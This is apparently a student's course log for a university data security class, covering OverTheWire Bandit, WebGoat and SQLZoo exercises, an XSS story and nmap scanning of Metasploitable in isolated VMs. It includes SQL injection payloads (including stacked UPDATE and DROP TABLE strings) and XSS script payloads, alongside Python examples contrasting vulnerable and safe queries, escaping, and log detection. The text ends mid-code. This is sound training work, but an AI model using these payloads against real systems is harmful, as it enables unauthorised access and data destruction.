
Data Security

Data Security ICT4TF022-3008 - early spring, 2022.
Haaga-Helia University of Applied Sciences
Teacher: Tero Karvinen.


H1, Become a hacker, step 0

Exercise Z
Read and summarize:
- Hutchins et al 2011: Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains, chapters Abstract, 3.2 Intrusion Kill Chain and 3.3 Courses of Action
- Karvinen 2020: Command Line Basics Revisited
- Karvinen 2021: Install Debian on VirtualBox
- Karvinen 2021: Install Webgoat 8 - Learn Web Pentesting

Exercise A
Bandit oh-five. Solve Over The Wire: Bandit the first five levels (0-4).

Exercise B
Bullseye. Install Debian 11-Bullseye virtual machine in VirtualBox.

Exercise C
WebGoat. Install WebGoat practice target.

Exercise D
Hacker warmup. Solve these tasks on WebGoat
General: HTTP Basics
General: Developer tools


Equipment used:
Lenovo L580 laptop, purchased 2018
- Processor: Intel Core i7-8550U, 4 cores
- Ram: 16GB
- Operating system: Windows 10 Pro, 64bit, build 19044
Virtualization:
Oracle VM VirtualBox, version 6.1.32
Debian-live-11.2.0-amd64-xfce+nonfree
- Ram: 4GB
- Cores: 1


Exercise Z

z) Read and summarize. (This subtask z does not require tests with a computer. Some bullets per article are enough for your summary)

- Hutchins et al 2011: Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains, chapters Abstract, 3.2 Intrusion Kill Chain and 3.3 Courses of Action
- Karvinen 2020: Command Line Basics Revisited
- Karvinen 2021: Install Debian on VirtualBox
- Karvinen 2021: Install Webgoat 8 - Learn Web Pentesting

Command Line Basics

I have used Linux before, so I am familiar with the basic commands, but I think it's never a bad thing to go back and look at the basics.

A few commands I think will be useful in this class are:
- sudo: run commands as superuser
- ssh: connect to other computers
- man: look at the manual of a new command
- /, ~, /home/, /etc/, cd: important directories and how to move between them

Karvinen 2021: Install Debian on VirtualBox

If you have problems installing Linux on VirtualBox, read this. I have done it before using this guide.

Karvinen 2021: Install Webgoat 8 - Learn Web Pentesting

I followed these instructions to install WebGoat. The most important thing is that after this the computer is very vulnerable to attacks, so don't do this on a computer that is used for anything else. Use a dedicated virtual machine that is not connected to the internet.


Exercise A

Bandit oh-five. Solve Over The Wire: Bandit the first five levels (0-4).

Bandit Level 0 (20.01.2022)

Level Goal
The goal of this level is for you to log into the game using SSH. The host to which you need to connect is bandit.labs.overthewire.org, on port 2220. The username is bandit0 and the password is bandit0. Once logged in, go to the Level 1 page to find out how to beat Level 1.

I am familiar with using ssh from previous classes. I opened a terminal (you could use Windows cmd). By default ssh uses port 22, so I need to use a flag to use a different port. Let's see what the manual has to say:
$ man ssh

New vm

So I use -p to set a different port, all the rest of the info I need is in the assignment.
$ ssh bandit0@bandit.labs.overthewire.org -p 2220

New vm

Bandit Level 0 → Level 1 (20.01.2022)

Level Goal
The password for the next level is stored in a file called readme located in the home directory. Use this password to log into bandit1 using SSH. Whenever you find a password for a level, use SSH (on port 2220) to log into that level and continue the game.


Where am I? $ pwd
Answer: /home/bandit0
So I am in the home directory of bandit0, just where I want to be. Let's see what I have in this folder.
$ ls
A readme file, let's see what it has inside.
$ cat readme
Seems like the password I am after.

bandit1

Now I log on to user bandit1 and use the password I just got.
$ ssh bandit1@bandit.labs.overthewire.org -p 2220

bandit 1 ssh

And I'm in.


Bandit Level 1 → Level 2, (20.01.2022)

Level Goal
The password for the next level is stored in a file called - located in the home directory


I need to read a file named -. I can't just type cat -, because it thinks I want to use a flag. So let's try to give it the full file path:
$ cat /home/bandit1/-

bandit2

Now I have the password for the next level and can log in to bandit2.
$ ssh bandit2@bandit.labs.overthewire.org -p 2220
And give the password I just got.

bandit 1 ssh

Works like a charm.

Bandit Level 2 → Level 3, (20.01.2022)

Level Goal
The password for the next level is stored in a file called spaces in this filename located in the home directory


I have a filename that has spaces in it. I can't cat that directly, so I put the filename inside "".
$ cat "spaces in this filename"

bandit 3

Success, once again!

Bandit Level 3 → Level 4, (20.01.2022)

Level Goal
The password for the next level is stored in a hidden file in the inhere directory.


A hidden file in the 'inhere' folder, I'll go there and find it.
$ cd inhere
$ ls

Nothing, so I try the show-all flag (-a) of the ls command.
$ ls -a
There it is, a file named .hidden. Cat that and I have the password for the next level.
$ cat .hidden

bandit 4

Bandit Level 4 → Level 5, (Debian 11.2, 20.01.2022)

Level Goal
The password for the next level is stored in the only human-readable file in the inhere directory. Tip: if your terminal is messed up, try the “reset” command.

Trial and error, cat files until I find the one, ctrl+c if things get out of hand.
$ cat /home/bandit4/inhere/-file00

bandit 5


Exercise B

Bullseye. Install Debian 11-Bullseye virtual machine in VirtualBox.

New VM

I open VirtualBox, press "New" and give a name to the virtual machine. I will call it Debian11DataSecurity, just to keep things clear in the future. After that, I need to give some RAM to it; this laptop has 16GB, so I can easily give 4GB and keep everything running smoothly. I press 'Create' and then I need to give it some hard drive space. I gave it 25GB, I'm not going to need all the space but there is enough to spare, and it only uses what it needs.

New vm


I can add a bit more CPU power to it if I need it, under Settings and System. I only have 4 cores in this laptop, so I will stay at 1 for the VM. Now I have an empty shell and still need to install an operating system on it.

New vm

Install Debian 11

First I need to download Debian 11 from debian.org, I chose 'Debian-live-11.2.0-amd64-xfce+nonfree'.

Debian download page

I start the VM and press the folder button, search the downloaded .iso file and add it. Then press 'start'.

add iso


Now I get the main menu for the installation. I choose 'Debian installer'.

Main menu

I went through the installation process mostly just clicking next and yes. When choosing a password for root and your user, REMEMBER to always choose strong passwords.

Install

And now I have a new install of Debian 11.2!

Install

User->Sudo

I need to make the user a sudoer, so that I don't need to use the root user. I log in as root and give the user johan sudo and adm privileges.
# sudo adduser johan sudo
# sudo adduser johan adm

I can check if this works by logging in as johan and running a command that needs sudo privileges, or by checking what groups johan belongs to.
$ sudo apt-get update
$ groups

johan to sudo


Exercise C

WebGoat. Install WebGoat practice target.

WebGoat

I started with a new Debian VM install that I am not going to use for anything other than WebGoat.
For this I followed the instructions on https://terokarvinen.com/2020/install-webgoat-web-pentest-practice-target/

Install java, firewall (ufw), wget and enable firewall
$ sudo apt-get update
$ sudo apt-get install openjdk-11-jre ufw wget
$ sudo ufw enable

Install webgoat from git and run it
$ wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.M26/webgoat-server-8.0.0.M26.jar
$ java -jar webgoat-server-8.0.0.M26.jar

Then I go to http://localhost:8080/WebGoat/ and see if it is working.

New vm

Perfect!


Exercise D

d) Hacker warmup. Solve these tasks on WebGoat
- General: HTTP Basics
- General: Developer tools

HTTP Basics

The guide is good, I just read it and did what was taught. I opened the inspect element to see what was the secret number.

webgoat http basics

webgoat http basics

Developer tools

I have never used developer tools to write JavaScript or anything else like this. But it was easy to follow the guide, it worked well, and I did understand what I was doing.

webgoat http basics



H2, Oh, wasp!

Exercise Z
Read and summarize
- OWASP: OWASP 10 2021
- A05:2021-Security Misconfiguration
- A06:2021-Vulnerable and Outdated Components
- Any episode from Darknet Diaries.

Exercise A
Sequel. Solve SQLZoo:
0 SELECT basics
2 SELECT from World

Exercise B
Injected. Solve WebGoat:
A1 Injection (intro)




Exercise Z

z) Read and summarize (This subtask z does not require tests with a computer. Some bullets per article are enough for your summary, feel free to write more if you like)

OWASP: OWASP 10 2021
- A05:2021-Security Misconfiguration
- A06:2021-Vulnerable and Outdated Components

Any episode from Darknet Diaries.


A05:2021-Security Misconfiguration

Systems can be misconfigured in many ways. Users don’t need to change their default passwords, servers have unnecessary services online, or the systems are just not updated.
https://owasp.org/Top10/A05_2021-Security_Misconfiguration/

A06:2021-Vulnerable and Outdated Components

Applications use components and dependencies that are made by other people, the application itself could be safe, but some of the parts used could have security flaws and not be patched.
You should know the versions of all the components used.
Remove components and dependencies that you don't need.
Always use official sources.
https://owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/

Darknet Diaries ep 92: The Pirate Bay

Interesting talk about the history of The Pirate Bay and the technology and people behind it. And of course all the different attacks and raids against it.
https://darknetdiaries.com/episode/92/


Exercise A

a) Sequel. Solve SQLZoo:
0 SELECT basics
2 SELECT from World


Exercises from https://sqlzoo.net/wiki/SQL_Tutorial

0 SELECT basics

The table world looks like this,

1
It is showing the population of France, but I want Germany, so I'll change the name of the country.
SELECT population
FROM world
WHERE name = 'France'

to
SELECT population
FROM world
WHERE name = 'Germany'

2
Now I have multiple country names to change.
SELECT name, population
FROM world
WHERE name IN ('Brazil', 'Russia', 'India', 'China');

to
SELECT name, population
FROM world
WHERE name IN ('Sweden', 'Norway', 'Denmark');

3
The last one wants me to find countries that have an area between 200,000 and 250,000 sq. km. Now I just change the query to that information.
SELECT name, area
FROM world
WHERE area BETWEEN 250000 AND 300000

to
SELECT name, area
FROM world
WHERE area BETWEEN 200000 AND 250000

Quiz
Easy quiz, but this is just the first introduction and SQL is not new stuff for me.

2 SELECT from World

The table world

1
This is just to show what happens when running this SQL command.
SELECT name, continent, population
FROM world

2
The command now shows countries that have exactly 64105700 population; I want to change that to countries with over 200000000 population.
SELECT name
FROM world
WHERE population = 64105700

to
SELECT name
FROM world
WHERE population > 200000000

3
I want the name and GDP per capita (GDP/population) of countries that have population of over 200 mill.
SELECT name, gdp/population
FROM world
WHERE population > 200000000

4
Name and population in millions of the continent 'South America'.
SELECT name, population/1000000
FROM world
WHERE continent = 'South America'

5
Name and population for France, Germany and Italy, I use the same WHERE name IN('') as before.
SELECT name, population
FROM world
WHERE name IN ('France', 'Germany', 'Italy')

6
Now I want countries that have the word "united" in them. I use the % sign to show that "united" can be anywhere in the country name.
SELECT name
FROM world
WHERE name LIKE ('%United%')

7
Show countries with an area over 3 million sq km or a population over 250 million.
SELECT name, population, area
FROM world
WHERE area > 3000000 OR population >250000000

8
Big by population or big by area, I use XOR like instructed.
SELECT name, population, area
FROM world
WHERE area > 3000000 XOR population >250000000

9
Using ROUND in SQL was new to me; I used the help page to find out how to use it: https://sqlzoo.net/wiki/ROUND
SELECT name, ROUND(population/1000000,2), ROUND(gdp/1000000000,2)
FROM world
WHERE continent = 'South America'

10
Now I use ROUND with -3 to round to the nearest 1000.
SELECT name, ROUND(gdp/population,-3)
FROM world
WHERE gdp > 1000000000000

11
The length of the country name is the same as the length of the capital's name.
SELECT name, capital
FROM world
WHERE LENGTH(name) = LENGTH(capital)

12

SELECT name, capital
FROM world
WHERE LEFT(name,1) = LEFT(capital,1) AND name <> capital

13
There may be an easier solution, but this is what I came up with.
SELECT name
FROM world
WHERE name LIKE '%a%'
AND name LIKE '%e%'
AND name LIKE '%i%'
AND name LIKE '%o%'
AND name LIKE '%u%'
AND name NOT LIKE '% %'

Quiz


Exercise B

Injected. Solve WebGoat:
A1 Injection (intro)

A1 Injection (intro)

2

Try to retrieve the department of the employee Bob Franco. Note that you have been granted full administrator privileges in this assignment and can access all data without authentication.

I get all the info needed; table name (employees), column names (department and last_name) and the name of the employee (Bob Franco).
SELECT department
FROM employees
WHERE last_name = 'Franco'

3
I have admin privileges on the table, so I can change information in it.
The example uses userid, so let's use it here; I know Tobi Barnet's userid is 89762.

https://www.w3schools.com/sql/sql_update.asp for a quick check how UPDATE was used.
UPDATE employees
SET department = 'Sales'
WHERE userid = 89762

4
Here I want to 'alters the structure of the existing database' so I use ALTER. Help can be found here: https://www.w3schools.com/sql/sql_alter.asp
ALTER TABLE employees
ADD phone varchar(20)

5
For number five I want to give the user 'UnauthorizedUser' privileges to ALTER tables.
Adding privileges is always fun, if only it was this easy all the time.
GRANT ALTER TABLE
TO UnauthorizedUser

10
Here I have a login field. On page 6 of the intro I had an example to show all entries: 'Smith' OR '1' = '1'. Here I have numbers, not names, so let's try it like this:
'0' OR '1' = '1'

11
Here I need to insert something into this part of the query, and get it to not use the auth_tan that comes after it:
WHERE last_name = '" + name + "' AND auth_tan = '" + auth_tan + "'
I can leave the name empty and use -- to comment out the authentication:
' OR 1=1 --
So the query would look like this:
WHERE last_name = '' OR 1=1 --' AND auth_tan = '...'

12
Here I can use the same idea as in number 3, but instead of department I use salary. The ; is used to add more commands to the query. I don't want to use a name, so I just use ' at the beginning, and I want to comment out the authentication process at the end. For the salary, just a bit over what Bob makes is good; I don't want to get caught.
'; UPDATE employees SET salary = 84000 WHERE userid = 37648 --

13
Dropping tables is not hard. I use the same things as before: no name, chain the command, I know the name of the table I want to delete, and comment out the rest of the query. DONE!
'; DROP TABLE access_log --
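As an added example (not WebGoat's code and not part of the original homework), here is the same concatenated query in Python with an in-memory SQLite database, next to the parameterised version that stops every payload used above. The employees table and its values are constructed for this example; WebGoat itself is Java, so this only reproduces the query shape, not the lesson's code.

```python
import sqlite3

# Constructed sample data modelled on the WebGoat employees table used above;
# the userids, salaries and TANs are made up for this example.
EMPLOYEES = [
    (37648, "Bob", "Franco", "Sales", 83000, "tan-bob"),
    (89762, "Tobi", "Barnet", "Development", 77000, "tan-tobi"),
]


def make_db():
    """Create an in-memory SQLite database with employees and access_log tables."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE employees (userid INTEGER, first_name TEXT, last_name TEXT,"
        " department TEXT, salary INTEGER, auth_tan TEXT)"
    )
    db.executemany("INSERT INTO employees VALUES (?, ?, ?, ?, ?, ?)", EMPLOYEES)
    db.execute("CREATE TABLE access_log (id INTEGER, message TEXT)")
    db.commit()
    return db


def build_query(name, auth_tan):
    """The string concatenation from the WebGoat lesson; the bug lives here."""
    return (
        "SELECT userid, last_name, salary FROM employees WHERE last_name = '"
        + name + "' AND auth_tan = '" + auth_tan + "'"
    )


def vulnerable_lookup(db, name, auth_tan):
    """Run the concatenated query as one statement.

    With name = "' OR 1=1 --" the WHERE clause becomes last_name = '' OR 1=1
    and the auth_tan check is commented out, so every employee is returned.
    """
    return db.execute(build_query(name, auth_tan)).fetchall()


def vulnerable_stacked(db, name, auth_tan):
    """Run the concatenated query with stacked statements allowed.

    sqlite3.execute() refuses a second statement, but executescript() (like a
    database driver that allows multiple statements per call) runs all of them,
    so the "'; UPDATE ... --" and "'; DROP TABLE ... --" payloads take effect.
    """
    db.executescript(build_query(name, auth_tan))


def safe_lookup(db, name, auth_tan):
    """Parameterised query: user input is bound as data and never parsed as SQL."""
    return db.execute(
        "SELECT userid, last_name, salary FROM employees"
        " WHERE last_name = ? AND auth_tan = ?",
        (name, auth_tan),
    ).fetchall()


def salary_of(db, userid):
    """Helper to observe whether a stacked UPDATE changed the table."""
    row = db.execute(
        "SELECT salary FROM employees WHERE userid = ?", (userid,)
    ).fetchone()
    return row[0] if row else None


def table_exists(db, table):
    """Helper to observe whether a stacked DROP TABLE removed the table."""
    row = db.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (table,)
    ).fetchone()
    return row is not None
```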


H3, Tricks, Tips and Playbooks



Exercise Z

z) Read and summarize (This subtask z does not require tests with a computer. Some bullets per article are enough for your summary, feel free to write more if you like)
Mitre 2022: ATT&CK Enterprise Matrix
- Give examples of a single, easy technique in each tactic. Which is the easiest?
- Explain technique, subtechnique, tactic and procedure. Give an example of each.
- Describe a procedure (a brief description is enough, no need to repeat all steps listed)

OWASP: Cross Site Scripting (XSS)

Mitre 2022: ATT&CK Enterprise Matrix

Mitre ATT&CK is a set of tactics and techniques used by threat hunters, red teamers, and defenders to better classify attacks and assess an organization's risk. By understanding the techniques that are used against them an organization can better determine how to mitigate and detect them.

Easy techniques:

Reconnaissance - Search Open Websites/Domains
Open-Source Intelligence is an easy and good way to start finding information on other people or companies.

Resource Development - Establish Accounts
If a Facebook account has a history, friends and other information, you are more likely to accept the friend request.

Initial Access - Exploit Public-Facing Application
Starting off by searching for weaknesses in the systems you may want to use, e.g. web pages.

Execution - Exploitation for Client Execution
Using weaknesses found in client software such as browsers.

Persistence - Browser Extensions
Malicious extensions can be used to scan everything that is done in browser and steal the information shown.

Privilege Escalation - Valid Accounts
Using the credentials of existing accounts to gain access.

Defense Evasion - Impair Defenses
An attacker can hinder or disable defensive mechanisms, not only firewalls and anti-virus, but also detection capabilities that can be used to log activity and identify malicious behavior.

Credential Access - Brute Force
A brute force attack uses programs that can guess passwords for as long as it takes to find the right one.

Discovery - Account Discovery

Lateral Movement - Remote Services
If the attacker can obtain a set of valid domain credentials, they could log in to many different machines using remote access.

Collection - Automated Collection
Using automated tools for collecting data based on file type, location or name.

Command and Control - Remote Access Software
Using desktop support and remote access software to access the target environment. These programs are used frequently as technical support software, and may be allowed by application control within a target environment.

Exfiltration - Exfiltration Over Web Service

Impact - Data Encrypted for Impact
Make stored data inaccessible by encrypting files or data, and demand money for the data.

Techniques

Techniques are how the goal is achieved by performing an action. For example, an adversary may dump credentials to achieve credential access.

Subtechniques

These are subcategories of techniques, they are a way to describe a specific implementation of a technique in more detail.

Tactics

Tactics are the "why", the reason for performing an action. For example, the attacker may want to achieve credential access.

https://attack.mitre.org/matrices/enterprise/

Cross Site Scripting

XSS is a form of injection attack that allows the attacker to inject code into websites. The user's web browser can't recognize that the code it receives is malicious; it already trusts the website it's on, so it will run the code.

https://owasp.org/www-community/attacks/xss/


Exercise Y

y) Cross Site Story. Write a short story or draw a comic of a cross site scripting attack. Make roles clear: who attacks? Who runs, what code, where? What unauthorized access is gained? (This subtask y does not require any tests with a computer.).

XSS story

Tim has a web page that he uses as an online portfolio; it has all the stuff he has done, from small school projects to big work projects. He made the page himself, of course, why pay money to someone else, and it's one more thing he can add to his portfolio. The page even has a search, so that it is easier to find things on his page.

One day a young kid, Jake, stumbled upon a Reddit post where Tim showed his site and asked for some help; he was trying to make the page look more 2020 and needed some input on design ideas. Jake feels left out in life and he wants to make a name for himself, and the perfect opportunity just arises: he will hack Tim's page and post it, then everyone will want to be his friend.

Jake noticed that Tim's page is running a search and the address bar lets you input the search words, like this: ...timsportfolio.pro/search?q= So he tried a basic alert, to see if the page accepts it.
...timsportfolio.pro/search?query=<script>alert("Hello World");</script>

It worked, he got a popup; now it's time to do something bigger. He sends the next script to change the first heading of the page.
<script>document.getElementsByTagName("h1")[0].innerHTML = "HackedByJakeTheBeast";</script>
Now just a screenshot and start sending it around!
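As an added example, not part of the original story and not code from any real site, here is the difference between a search page that reflects the query term raw (as Tim's does) and one that HTML-escapes it, followed by a check over constructed web-server log lines that catches the percent-encoded form of the probe used above. The domain, the log lines and the handler functions are all assumptions made for this example.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The two payloads from the story above, used here as constructed test input.
PROBE = '<script>alert("Hello World");</script>'
DEFACE = ('<script>document.getElementsByTagName("h1")[0].innerHTML'
          ' = "HackedByJakeTheBeast";</script>')


def search_term(url):
    """Pull the search term out of ?q= or ?query= (the story uses both spellings)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for key in ("q", "query"):
        if key in params:
            return params[key][0]
    return ""


def render_results_vulnerable(term):
    """Reflect the term verbatim into the page, as Tim's search does."""
    return (
        f"<h1>Search results for {term}</h1>\n"
        f'<input name="q" value="{term}">\n'
    )


def render_results_safe(term):
    """Escape the term for both HTML text and attribute context before reflecting it.

    html.escape(..., quote=True) turns < > & " ' into entities, so the browser
    displays the payload as text instead of executing it.
    """
    safe = html.escape(term, quote=True)
    return (
        f"<h1>Search results for {safe}</h1>\n"
        f'<input name="q" value="{safe}">\n'
    )


def has_live_script(page_html):
    """True if the rendered page contains an actual <script> element."""
    return re.search(r"<script\b", page_html, re.IGNORECASE) is not None


# Constructed access-log lines in Apache common log format (not from a real server).
ACCESS_LOG = """\
10.0.0.5 - - [12/Feb/2022:10:01:02 +0200] "GET /search?q=portfolio HTTP/1.1" 200 512
10.0.0.9 - - [12/Feb/2022:10:02:17 +0200] "GET /search?query=%3Cscript%3Ealert(%22Hello%20World%22)%3B%3C/script%3E HTTP/1.1" 200 640
10.0.0.9 - - [12/Feb/2022:10:03:40 +0200] "GET /search?query=%3Cscript%3Edocument.getElementsByTagName(%22h1%22)%5B0%5D.innerHTML%3D%22Hacked%22%3B%3C/script%3E HTTP/1.1" 200 655
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) ')


def flag_script_requests(log_text):
    """Return (client, timestamp, decoded path) for requests carrying a <script tag.

    The path is percent-decoded before matching; otherwise %3Cscript%3E would
    slip past a naive substring search.
    """
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, when, path = m.groups()
        decoded = unquote(path)
        if re.search(r"<script\b", decoded, re.IGNORECASE):
            hits.append((client, when, decoded))
    return hits
```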


Exercise A

a) Webgoat: A3 Sensitive data exposure
Insecure Login: 2 Let's try

Wireshark

First, I install Wireshark
$ sudo apt-get install wireshark -y
Start Wireshark and double-click on "any". Now I only want POSTs, so let's put that in "apply display filter".

Go back to WebGoat and press "Log in", then check back in Wireshark. Wireshark got us two packets; let's find out what they have inside.

At the very end of the first packet, I have what I want, a username and password.

Let's try it out!

Exercise B

b) Webgoat: A7 Cross Site Scripting (XSS): Cross site scripting
2 What is XSS?
7 Try It! Reflected XSS

Webgoat: A7 Cross Site Scripting (XSS)

2
Here I use F12 in the browser to get the console and run JavaScript; the code snippet is given to us:
javascript:alert(document.cookie);
The cookies were the same.

7
I want to know what field is prone to XSS attacks, so I try a basic 'hello world' script in the fields. The field that worked was 'credit card number:'
<script>alert('HelloWorld')</script>



H4, Intelligence gap

Equipment used:
Lenovo L580 laptop, purchased 2018
- Processor: Intel Core i7-8550U, 4 cores
- Ram: 16GB
- Operating system: Windows 10 Pro, 64bit, build 19044

Virtualization:
Oracle VM VirtualBox, version 6.1.32
Debian-live-11.2.0-amd64-xfce+nonfree
- Ram: 4GB
- Cores: 1
Metasploitable: 2.0.0
- Ram: 4GB
- Cores: 1
kali-linux-2021.4a-amd64
- Ram: 4GB
- Cores: 1


Exercise Z

z) Read (or watch or listen) and summarize (This subtask z does not require tests with a computer. Some bullets per article is enough for your summary, feel free to write more if you like)

€ Santos et al: The Art of Hacking (Video Collection): 3. Passive Reconnaissance: 3.0 - 3.4 (five videos, about 35 min)

€ Santos et al: The Art of Hacking (Video Collection): 4. Active Reconnaissance: 4.0 - 4.3 (four videos, about 20 min)

Lyon 2009: Nmap Network Scanning: Chapter 15. Nmap Reference Guide: Port Scanning Basics (what's open, closed and filtered? This is a sample chapter from a book by the author of nmap, Gordon Lyon aka Fyodor Vaskovich)

3. Passive Reconnaissance

Passive and active reconnaissance is a very important step in getting information about the systems you are trying to attack, and this step should not be skipped.
Passive recon is when you do not try to connect to the target. Browsing sites is still passive, port scanning is not.
Searching for public data is a good and easy way to get to know the systems and employees of the target, using Google, certificates, hostnames and domain information. Searching 'site:example.com pdf' shows PDF files that are on that site; you could get lucky and find something that will help you attack the system.
Search names and passwords from published breaches and match the names you found to the employees of the company you found through open-source intelligence.

4. Active Reconnaissance

The reconnaissance is active when you start sending traffic, like port scans, which could trigger alarms in the system you scan. It is also illegal in many places.
The more you scan and dig, the "louder" you get, and if the system is monitored you risk getting caught. Good reconnaissance gives you the info you need without getting caught, so it is not necessary to go "all in" at first contact.
A good starting point is to first do port scanning, then a web service review and at the end vulnerability scanning.

Nmap

- Open: the port is open and has a program answering.
- Closed: the port is reachable, but has no program answering.
- Filtered: Nmap can't figure out if the port is open or not; the packets it sends can't reach the port.


Exercise A

a) My networks. Add a new vboxnet internal network to your VirtualBox (File: Host Network Manager...)

Internal Network

Internal Network

When you configure one or more VM's to sit on an Internal network, VirtualBox ensures that all traffic on that network stays within the host and is only visible to VM's on that virtual network.
The internal network is a totally isolated network and so is very "quiet". This is good for testing when you need a separate, clean network

A host-only network has the host device in the same network as the VMs. I want to keep my host away from this network, so I will make an internal network that only my VMs have access to.

Open VirtualBox, press "settings" on the VM I want to change the network on, go to "Network" and change "Attached to:" to "Internal network", for this I make a new network, just write the name you want.

DHCP

The internal network has no DHCP (Dynamic Host Configuration Protocol) server settings ready, so I need to make them.
For this part, I followed an article by Kapil Verma on how to add DHCP to the internal network. The DHCP server assigns IP addresses automatically to the devices connected to the network and is needed for the network to work.
https://54m4ri74n.medium.com/building-an-internal-network-in-virtualbox-d0a4974882d0

Open Windows cmd (Command Prompt) and go to the path of the Oracle install files, for me it's C:\Program Files\Oracle\VirtualBox
I use vboxmanage.exe to set up the DHCP server for SecNet1; the parameters I need are listed here:
- netname: the internal network name
- ip: the IP address of your DHCP server inside the internal network
- netmask: the subnet mask
- lowerip: the start of the IP addresses that can be assigned to network members
- upperip: the end of the same range
- enable: enable the DHCP server

So the command in full looks like this:
vboxmanage dhcpserver add --netname SecNet1 --ip 10.10.10.1 --netmask 255.255.255.0 --lowerip 10.10.10.2 --upperip 10.10.10.212 --enable

Use vboxmanage list dhcpservers to see the one I just created.

Log in to the VM and check if the DHCP server gives us an IP, and yes it did: the IP for this VM in our internal network is 10.10.10.2


Exercise B

b) Punchbag. Install Metasploitable 2 practice target on Virtual Box, and only connect it to your new virtual network. Login to Metasploitable 2 and find out its IP address.

Metasploitable 2

First I download Metasploitable 2 from https://www.vulnhub.com/entry/metasploitable-2,29/. The installation process is a bit different: first I choose "New", give it a name, type is Linux and version is Ubuntu, and for RAM (2GB is recommended) I gave 4GB. Now under Hard disk, I "use an existing virtual hard disk file" and add the metasploitable.vmdk that was in the downloaded folder. Then just press Create and I am done.

Connect this new VM to the same internal network as the VM that I want to use in the attacks.

Start the VM and log in; the login is "msfadmin" and the default password is "msfadmin". Then check the IP (10.10.10.3). This is the IP I will use to attack this VM.


Exercise C

c) Hero arrives. Connect the Linux computer you've been using to the same network (e.g. Debian 11-bullseye).


Both are using 'SecNet1'


Exercise D

d) Hello sploitable! Open the website on Metasploitable 2. If you can't open the expected website, you're not looking at the correct computer, don't run any scans or any similar tests.

Connection

Start both VM's, metasploitable and the one you are going to do the attacking with. Then just open a browser and head to http://Insert_IP_of_metasploitable2_VM_here. Remember, not https:// !


Exercise E

e) Scanalyses. Port scan Metasploitable 2. Analyze the results. This is a big task: explain all you can understand from the results. Is there something untypical for a server publicly visible on the Internet? Do you think some services could be especially vulnerable, a good start for the initial foothold? Your explanation should take the main part of your answer. Make sure you only port scan the correct computer. Disconnect your host computer from the Internet as needed.

Nmap

$ sudo nmap -sV 10.10.10.3
Scan the top 1000 ports
-sV detects versions
Some modifications to how this list looks were made on 07.04.2022.

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login       OpenBSD or Solaris rlogind
514/tcp   open  shell       Netkit rshd
1099/tcp  open  java-rmi    GNU Classpath grmiregistry
1524/tcp  open  bindshell   Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
42496/tcp open  status      1 (RPC #100024)
46288/tcp open  java-rmi    GNU Classpath grmiregistry
47724/tcp open  nlockmgr    1-4 (RPC #100021)
52763/tcp open  mountd      1-3 (RPC #100005)
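As an added example (not part of the original homework and not an nmap feature), here is a small Python triage of the -sV output above: it parses the lines into fields, tolerates the run-together "42496/tcpopen" form the paste produced, and groups the open ports by why a defender would care about them. The embedded lines are a subset copied from the scan above; the category names and groupings are this example's own choices.

```python
import re

# A subset of the -sV lines from the scan above (Metasploitable 2 at 10.10.10.3),
# including one line in the run-together "42496/tcpopen" form the paste produced.
SCAN_OUTPUT = """\
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open shell Netkit rshd
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
42496/tcpopen status 1 (RPC #100024)
"""

# port/proto, state, service, and whatever version text follows; \s* after the
# protocol lets "42496/tcpopen" parse like the properly spaced lines.
LINE_RE = re.compile(
    r"^(\d+)/(tcp|udp)\s*(open|closed|filtered|open\|filtered)\s+(\S+)\s*(.*)$"
)

# nmap service names grouped by the concern they raise (this example's grouping).
CATEGORIES = {
    "cleartext login or remote exec": {"telnet", "login", "shell", "exec", "ftp"},
    "database reachable from the network": {"mysql", "postgresql"},
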